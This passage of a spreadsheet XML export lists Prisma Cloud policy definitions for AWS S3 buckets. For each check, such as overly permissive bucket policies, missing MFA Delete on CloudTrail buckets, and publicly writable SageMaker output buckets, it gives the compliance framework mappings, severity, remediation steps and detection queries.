          <t>PCI DSS v4.0, ISO/IEC 27001:2022, ISO 27002:2022, HIPAA, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, RBI Baseline Cyber Security and Resilience Requirements, RBI Baseline Cyber Security and Resilience Requirements, CIS Controls v8.1, ISO 27002:2022, NIST CSF v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), NIST 800-53 Rev 5, NIST SP 800-171 Revision 3, ISO 27002:2022, CIS Controls v8.1, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, HIPAA, kashan ACSC Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, Australian Energy Sector Cyber Security Framework (AESCSF), CIS Controls v7.1, CHC HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), PCI DSS v4.0, Secure Controls Framework (SCF) - 2024.2, Sarbanes Oxley Act (SOX), PCI DSS v4.0, Copy of CIS Controls v8, PCI DSS v4.0, CRI Profile v1.2.1, CIS Controls v8, CIS Controls v8, MLPS 2.0 (Level 2), CRI Profile v2.0, SOC 2, SOC 2, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, TX-RAMP Level 1, ISO 27002:2022, Copy of CIS Controls v8, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST CSF v.9.6.0, PCI DSS v4.0, kfirdaus AWS Account-CS, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), FFIEC, AWS Well-Architected Framework, PCI DSS v4.0</t>
        </is>
      </c>
      <c r="B2080" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2080" s="2" t="inlineStr"/>
      <c r="D2080" t="n">
        <v>0</v>
      </c>
      <c r="E2080" t="n">
        <v>13</v>
      </c>
      <c r="F2080" t="n">
        <v>0</v>
      </c>
      <c r="G2080" t="b">
        <v>1</v>
      </c>
      <c r="H20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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2080" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2080" t="inlineStr">
        <is>
          <t>AWS S3 bucket policy overly permissive to any principal</t>
        </is>
      </c>
      <c r="L2080" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M2080" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2080" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2080" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2080" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2080" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2080" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S2080" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T2080" t="b">
        <v>0</v>
      </c>
      <c r="U2080" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2080" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2080" t="inlineStr">
        <is>
          <t>This policy identifies the S3 buckets that have a bucket policy overly permissive to any principal and do not have Block public and cross-account access to buckets and objects through any public bucket or access point policies enabled. It is recommended to follow the principle of least privileges ensuring that the only restricted entities have permission on S3 operations instead of any anonymous.
For more details: https://docs.aws.amazon.com/AmazonS3/latest/userguide/s3-bucket-user-policy-specifying-principal-intro.html</t>
        </is>
      </c>
      <c r="X2080" t="inlineStr">
        <is>
          <t>1. Log in to the AWS console
2. Navigate to the S3 dashboard
3. Choose the reported S3 bucket
4. In the 'Permissions' tab, click on the 'Bucket Policy'
5. Update the S3 bucket policy, by removing Principal conatining wildcard(*) to specific accounts, Services or IAM entities. Also restrict S3 action operations to specific instead of using wildcard (*).
6. In the 'Permissions' tab, click on the 'Block public access' and enable 'Block public and cross-account access to buckets and objects through any public bucket or access point policies' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/s3-policies/bc-aws-s3-23
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/s3-policies/bc-aws-s3-23</t>
        </is>
      </c>
      <c r="Y2080" t="inlineStr"/>
      <c r="Z2080" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name='aws-s3api-get-bucket-acl' AND json.rule = ( ( publicAccessBlockConfiguration.restrictPublicBuckets is false and accountLevelPublicAccessBlockConfiguration does not exist ) or ( publicAccessBlockConfiguration does not exist and accountLevelPublicAccessBlockConfiguration.restrictPublicBuckets is false ) or ( publicAccessBlockConfiguration.restrictPublicBuckets is false and accountLevelPublicAccessBlockConfiguration.restrictPublicBuckets is false ) or ( publicAccessBlockConfiguration does not exist and accountLevelPublicAccessBlockConfiguration does not exist ) )AND policy.Statement[?any(Effect equals Allow and Action anyStartWith s3: and (Principal.AWS contains * or Principal equals *) and (Condition does not exist or Condition[*] is empty) )] exists
{"category":"Storage","resourceTypes":["aws_s3_bucket","aws_s3_bucket_policy"]}</t>
        </is>
      </c>
      <c r="AA2080" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2080" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2080" t="inlineStr">
        <is>
          <t>PC-AWS-S3-735-CKV_AWS_70</t>
        </is>
      </c>
      <c r="AD2080" t="b">
        <v>1</v>
      </c>
      <c r="AE2080" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2080" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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0" t="inlineStr">
        <is>
          <t>8827bbb9-bf4b-4d39-a21d-dcf62037244d</t>
        </is>
      </c>
      <c r="AI2080" t="inlineStr">
        <is>
          <t>eecb0c21-2dbe-40f4-8727-fbbaacef69dc</t>
        </is>
      </c>
      <c r="AJ2080" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2080" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2081">
      <c r="A2081" t="inlineStr">
        <is>
          <t>HIPAA, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, ISO/IEC 27001:2022, Demo_Daryl ACSC Information Security Manual (ISM), ISO/IEC 27017:2015, APRA (CPS 234) Information Security, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Secure Controls Framework (SCF) - 2024.2, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, NIST SP 800-172, Demo_Daryl ACSC Information Security Manual (ISM), HITRUST CSF v.11.2.0, ISO/IEC 27017:2015, kfirdaus AWS Account-CS, CSA CCM v.4.0.1, ACSC Information Security Manual (ISM), NIST SP 800-171 Revision 3, APRA (CPS 234) Information Security, MITRE ATT&amp;CK v8.2 [Deprecated], NYDFS 23 CRR-NY 500.0, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, ISO/IEC 27001:2022, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), MITRE ATT&amp;CK v12, TX-RAMP Level 1, CSA CCM v4.0.12, ISO 27002:2022, jneytchev-fedramp-low, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST 800-53 Rev4, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27017:2015, ISO/IEC 27017:2015, Matt's ATT&amp;ACK, Secure Controls Framework (SCF) - 2022.2.1, Copy of ACSC Information Security Manual (ISM)-clone, HIPAA, HITRUST CSF v.11.2.0, Copy of ACSC Information Security Manual (ISM)-clone, CDC NIST 800-53 Rev4, Fedramp (Moderate), NIST CSF, ISO/IEC 27001:2022, Fedramp (Low), ISO/IEC 27017:2015, MAS TRM 2021, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Telecommunications Security Act - TSA, Sarbanes Oxley Act (SOX), PCI DSS v4.0, Sarbanes Oxley Act (SOX), kashan ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, Fedramp (Low), NIST 800-53 Rev 5, ISO/IEC 27002:2013, MITRE ATT&amp;CK v6.3 [Deprecated], TX-RAMP Level 2, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, PCI DSS v3.2.1, Risk Management in Technology (RMiT), CyberSecurity Law of the People's Republic of China, TX-RAMP Level 2, ISO/IEC 27002:2013, NIST SP 800-171 Revision 3, CIS Controls v8, MLPS 2.0 (Level 2), ISO/IEC 27017:2015, CSA CCM v.4.0.1, Telecommunications Security Act - TSA, ISO/IEC 27002:2013, SOC 2, NYDFS 23 CRR-NY 500.0, CSA CCM v.4.0.1, ISO/IEC 27001:2022, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, MLPS 2.0, HIPAA, Secure Controls Framework (SCF) - 2024.2, APRA (CPS 234) Information Security, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CDC NIST 800-53 Rev4, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, HITRUST v.9.4.2 [Deprecated], HITRUST CSF v.11.2.0, CIS Controls v8.1, MLPS 2.0 (Level 3), Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, ISO 27002:2022, Copy of CIS Controls v8, ISO/IEC 27001:2022, HITRUST CSF v.9.6.0, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, NYDFS 23 CRR-NY 500.0, NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), ISO/IEC 27002:2013, MITRE ATT&amp;CK v10.0 [Deprecated], ITSG-33, jneytchev-fedramp-low, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, Telecommunications Security Act - TSA, NIST 800-53 Rev 5, CIS Controls v7.1, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), NIST SP 800-171 Revision 2, CHC HITRUST CSF v.9.6.0, Fedramp (Moderate), NIST SP 800-172, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, kfirdaus AWS Account-CS, CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), ISO/IEC 27018:2019, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), ACSC Information Security Manual (ISM), Microsoft Cloud Security Benchmark v1, kashan ACSC Information Security Manual (ISM)</t>
        </is>
      </c>
      <c r="B2081" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2081" s="2" t="inlineStr"/>
      <c r="D2081" t="inlineStr"/>
      <c r="E2081" t="inlineStr"/>
      <c r="F2081" t="inlineStr"/>
      <c r="G2081" t="b">
        <v>0</v>
      </c>
      <c r="H20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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2081" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2081" t="inlineStr">
        <is>
          <t>AWS CloudTrail S3 buckets have not enabled MFA Delete</t>
        </is>
      </c>
      <c r="L2081" t="inlineStr">
        <is>
          <t>MFA</t>
        </is>
      </c>
      <c r="M2081" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2081" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2081" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2081" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2081" t="inlineStr">
        <is>
          <t>Guidelines for System Hardening</t>
        </is>
      </c>
      <c r="R2081" t="inlineStr">
        <is>
          <t>ISM-1173</t>
        </is>
      </c>
      <c r="S2081" t="inlineStr"/>
      <c r="T2081" t="b">
        <v>0</v>
      </c>
      <c r="U2081" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2081" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2081" t="inlineStr">
        <is>
          <t>This policy identifies the S3 buckets which do not have Multi-Factor Authentication enabled for CloudTrails. For encryption of log files, CloudTrail defaults to use of S3 server-side encryption (SSE). We recommend adding an additional layer of security by adding MFA Delete to your S3 bucket. This will help to prevent deletion of CloudTrail logs without your explicit authorization. We also encourage you to use a bucket policy that places restrictions on which of your identity access management (IAM) users are allowed to delete S3 objects.</t>
        </is>
      </c>
      <c r="X2081" t="inlineStr">
        <is>
          <t>Enable MFA Delete on the bucket(s) you have configured to receive CloudTrail log files.
Note: We recommend that you do not configure CloudTrail to write into an S3 bucket that resides in a different AWS account.
Additional information on how to do this can be found here:
 http://docs.aws.amazon.com/AmazonS3/latest/dev/Versioning.html#MultiFactorAuthenticationDelete</t>
        </is>
      </c>
      <c r="Y2081" t="inlineStr"/>
      <c r="Z2081" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-s3api-get-bucket-acl' as X; config from cloud.resource where api.name = 'aws-cloudtrail-describe-trails' as Y; filter '($.Y.s3BucketName==$.X.bucketName) and ($.X.versioningConfiguration.mfaDeleteEnabled does not exist)'; show X;</t>
        </is>
      </c>
      <c r="AA2081" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2081" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2081" t="inlineStr">
        <is>
          <t>PC-AWS-S3-306</t>
        </is>
      </c>
      <c r="AD2081" t="b">
        <v>1</v>
      </c>
      <c r="AE2081" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2081" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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1" t="inlineStr">
        <is>
          <t>ed8d6416-1064-4e78-9e34-02336894df44</t>
        </is>
      </c>
      <c r="AI2081" t="inlineStr">
        <is>
          <t>55486658-ae4a-4691-9eb7-a1074981fbe7</t>
        </is>
      </c>
      <c r="AJ2081" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2081" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2082">
      <c r="A2082" t="inlineStr"/>
      <c r="B2082" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2082" s="2" t="inlineStr"/>
      <c r="D2082" t="inlineStr"/>
      <c r="E2082" t="inlineStr"/>
      <c r="F2082" t="inlineStr"/>
      <c r="G2082" t="b">
        <v>1</v>
      </c>
      <c r="H20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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2082" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2082" t="inlineStr">
        <is>
          <t>Data exposure risk due to sensitive data in AWS S3 bucket that allows access to any principal</t>
        </is>
      </c>
      <c r="L2082" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,DISCOVERY</t>
        </is>
      </c>
      <c r="M2082" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2082" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2082" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2082" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2082" t="inlineStr"/>
      <c r="R2082" t="inlineStr"/>
      <c r="S2082" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2082" t="b">
        <v>0</v>
      </c>
      <c r="U2082" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2082" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2082" t="inlineStr">
        <is>
          <t>This policy identifies the risk of a data breach due to an overly permissive AWS S3 bucket policy that allows access to any principal and the presence of sensitive data.
The combination of these events significantly increases the potential impact of a breach, as unauthorized users may gain access to the sensitive data stored in the S3 bucket.
Immediate attention is required to enforce stricter access methods for the reported S3 bucket as it contains sensitive information.</t>
        </is>
      </c>
      <c r="X2082" t="inlineStr">
        <is>
          <t>[MISCONFIGURATION]
1. Log in to the AWS console
2. Navigate to the S3 dashboard
3. Choose the reported S3 bucket
4. In the 'Permissions' tab, click on the 'Bucket Policy'
5. Update the S3 bucket policy, by removing Principal conatining wildcard(*) to specific accounts, Services or IAM entities. Also restrict S3 action operations to specific instead of using wildcard (*).
6. In the 'Permissions' tab, click on the 'Block public access' and enable 'Block public and cross-account access to buckets and objects through any public bucket or access point policies'
[DATA_EXPOSURE]
1. Make sure the resource is not exposed to public.
2. Delete or move the sensitive data if it is mistakenly place</t>
        </is>
      </c>
      <c r="Y2082" t="inlineStr"/>
      <c r="Z2082" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-s3api-get-bucket-acl') and finding.name contains all ('AWS S3 bucket policy overly permissive to any principal','Storage Asset with sensitive data found')</t>
        </is>
      </c>
      <c r="AA2082" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2082" t="inlineStr">
        <is>
          <t>2024-01-19 05:21:12</t>
        </is>
      </c>
      <c r="AC2082" t="inlineStr"/>
      <c r="AD2082" t="b">
        <v>1</v>
      </c>
      <c r="AE2082" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2082" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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2" t="inlineStr">
        <is>
          <t>77311143-149f-4c03-9f52-313fd71965c4</t>
        </is>
      </c>
      <c r="AI2082" t="inlineStr">
        <is>
          <t>84bb91d2-ef45-434a-8203-ea57ddf08a41</t>
        </is>
      </c>
      <c r="AJ2082" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2082" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2083">
      <c r="A2083" t="inlineStr"/>
      <c r="B2083" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2083" s="2" t="inlineStr"/>
      <c r="D2083" t="inlineStr"/>
      <c r="E2083" t="inlineStr"/>
      <c r="F2083" t="inlineStr"/>
      <c r="G2083" t="b">
        <v>1</v>
      </c>
      <c r="H20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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2083" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2083" t="inlineStr">
        <is>
          <t>Data exposure risk due to AWS S3 hosting static website contains sensitive information</t>
        </is>
      </c>
      <c r="L2083" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,DISCOVERY</t>
        </is>
      </c>
      <c r="M2083" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2083" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2083" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2083" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2083" t="inlineStr"/>
      <c r="R2083" t="inlineStr"/>
      <c r="S2083" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2083" t="b">
        <v>0</v>
      </c>
      <c r="U2083" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2083" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2083" t="inlineStr">
        <is>
          <t>This policy identifies potential data breach risk due to AWS S3 buckets containing sensitive information and hosting static website. 
The combination of sensitive data in the S3 asset and hosting a static website increases the risk of unauthorized access and data exposure. AWS S3 hosted static website will be public and it is supposed to not contain any sensitive information otherwise bucket might end up with data exposure.
Immediate attention is required to review the S3 static website hosting configuration as soon as possible and enforce stricter access methods for the reported S3 bucket as it contains sensitive information.</t>
        </is>
      </c>
      <c r="X2083" t="inlineStr">
        <is>
          <t>[MISCONFIGURATION]
1. Login to AWS Console
2. Goto S3 under Services
3. Choose the reported bucket
4. Goto Properties tab
5. Click on Static website hosting
6. Click on Disable website hosting
7. Click on Save
[DATA_EXPOSURE]
1. Make sure the resource is not exposed to public.
2. Delete or move the sensitive data if it is mistakenly place</t>
        </is>
      </c>
      <c r="Y2083" t="inlineStr"/>
      <c r="Z2083" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-s3api-get-bucket-acl') and finding.name contains all ('(Disabled) AWS S3 buckets with configurations set to host websites','Storage Asset with sensitive data found')</t>
        </is>
      </c>
      <c r="AA2083" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2083" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:05</t>
        </is>
      </c>
      <c r="AC2083" t="inlineStr"/>
      <c r="AD2083" t="b">
        <v>1</v>
      </c>
      <c r="AE2083" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2083" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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3" t="inlineStr">
        <is>
          <t>bc08f94a-a0f1-49fc-9e37-1d7a27be501e</t>
        </is>
      </c>
      <c r="AI2083" t="inlineStr">
        <is>
          <t>a955d576-bd6c-45f2-b460-270f039c99e5</t>
        </is>
      </c>
      <c r="AJ2083" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2083" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2084">
      <c r="A2084" t="inlineStr"/>
      <c r="B2084" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2084" s="2" t="inlineStr"/>
      <c r="D2084" t="inlineStr"/>
      <c r="E2084" t="inlineStr"/>
      <c r="F2084" t="inlineStr"/>
      <c r="G2084" t="b">
        <v>1</v>
      </c>
      <c r="H20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084" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2084" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2084" t="inlineStr">
        <is>
          <t>AWS S3 bucket is utilized for AWS Bedrock Custom model training data</t>
        </is>
      </c>
      <c r="L2084" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2084" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2084" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2084" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2084" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2084" t="inlineStr"/>
      <c r="R2084" t="inlineStr"/>
      <c r="S2084" t="inlineStr"/>
      <c r="T2084" t="b">
        <v>0</v>
      </c>
      <c r="U2084" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2084" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2084" t="inlineStr">
        <is>
          <t>This policy identifies the AWS S3 bucket utilized for AWS Bedrock Custom model training job data.
S3 buckets store the datasets required for training Custom models in AWS Bedrock. Proper configuration and access control are essential to ensure the security and integrity of the training data. Improperly configured S3 buckets used for AWS Bedrock Custom model training data can lead to unauthorized access, data breaches, and potential loss of sensitive information.
It is recommended to implement strict access controls, enable encryption, and audit permissions to secure AWS S3 buckets for AWS Bedrock Custom model training data and ensure compliance.
NOTE: This policy is designed to identify the S3 buckets utilized for training custom models in AWS Bedrock. It does not signify any detected misconfiguration or security risk.</t>
        </is>
      </c>
      <c r="X2084" t="inlineStr">
        <is>
          <t>To protect the S3 buckets utilized by the AWS Bedrock Custom model training job data, please refer to the following link for recommended best practices
https://docs.aws.amazon.com/AmazonS3/latest/userguide/security-best-practices.html</t>
        </is>
      </c>
      <c r="Y2084" t="inlineStr"/>
      <c r="Z2084" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-s3api-get-bucket-acl' as X; config from cloud.resource where api.name = 'aws-bedrock-custom-model' as Y; filter ' $.Y.trainingDataConfig.bucketName equals $.X.bucketName'; show X;</t>
        </is>
      </c>
      <c r="AA2084" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2084" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2084" t="inlineStr">
        <is>
          <t>PC-AWS-S3-1289</t>
        </is>
      </c>
      <c r="AD2084" t="b">
        <v>1</v>
      </c>
      <c r="AE2084" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2084" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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84" t="inlineStr">
        <is>
          <t>3ae1c090-9b1b-4b6b-ad86-8432bacdd4ca</t>
        </is>
      </c>
      <c r="AI2084" t="inlineStr">
        <is>
          <t>10e82d6f-a9e6-4de3-9d05-c47551482bfc</t>
        </is>
      </c>
      <c r="AJ2084" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2084" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2085">
      <c r="A2085" t="inlineStr"/>
      <c r="B2085" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2085" s="2" t="inlineStr"/>
      <c r="D2085" t="inlineStr"/>
      <c r="E2085" t="inlineStr"/>
      <c r="F2085" t="inlineStr"/>
      <c r="G2085" t="b">
        <v>1</v>
      </c>
      <c r="H20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85" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2085" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2085" t="inlineStr">
        <is>
          <t>AI model tampering risk due to publicly writable S3 bucket used for storing SageMaker training job output</t>
        </is>
      </c>
      <c r="L2085" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2085" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2085" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2085" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2085" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2085" t="inlineStr"/>
      <c r="R2085" t="inlineStr"/>
      <c r="S2085" t="inlineStr"/>
      <c r="T2085" t="b">
        <v>0</v>
      </c>
      <c r="U2085" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2085" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2085" t="inlineStr">
        <is>
          <t>This policy identifies the potential risk of AI model tampering due to an AWS S3 bucket used for storing AWS SageMaker training job output that is publicly writable.
S3 buckets store the results and artifacts generated from training machine learning models in SageMaker. When these buckets have public write permissions, there is an increased risk of unauthorized access, data breaches, and potential tampering with sensitive model information. This could lead to compromised model integrity and accuracy.
Immediate attention is required to enforce stricter access controls for the reported S3 bucket used for AWS SageMaker training job outputs to prevent unauthorized write access and ensure data security.</t>
        </is>
      </c>
      <c r="X2085"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PUT/CREATE/REPLICATE/DELETE objects in your S3 bucket. You may also want to specifically limit the 'Principal' ability to perform specific PUT/CREATE/REPLICATE/DELETE functions, without the wild card.
If 'Bucket Policy' is not required delete the existing 'Bucket Policy'.
b. Click on Save changes
Note: Make sure updating 'Access Control List' or 'Bucket Policy' does not affect S3 bucket data access.</t>
        </is>
      </c>
      <c r="Y2085" t="inlineStr"/>
      <c r="Z2085" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-s3api-get-bucket-acl') and finding.name contains all ('AWS S3 bucket publicly writable','AWS S3 bucket used for storing AWS Sagemaker training job output')</t>
        </is>
      </c>
      <c r="AA2085" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2085" t="inlineStr">
        <is>
          <t>2024-07-08 06:43:44</t>
        </is>
      </c>
      <c r="AC2085" t="inlineStr"/>
      <c r="AD2085" t="b">
        <v>1</v>
      </c>
      <c r="AE2085" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2085" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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85" t="inlineStr">
        <is>
          <t>adf32b6c-d348-4f74-b594-3ae30a3c1a70</t>
        </is>
      </c>
      <c r="AI2085" t="inlineStr">
        <is>
          <t>892f7881-3450-4728-a95b-426fb7aaf1b0</t>
        </is>
      </c>
      <c r="AJ2085" t="inlineStr">
        <is>
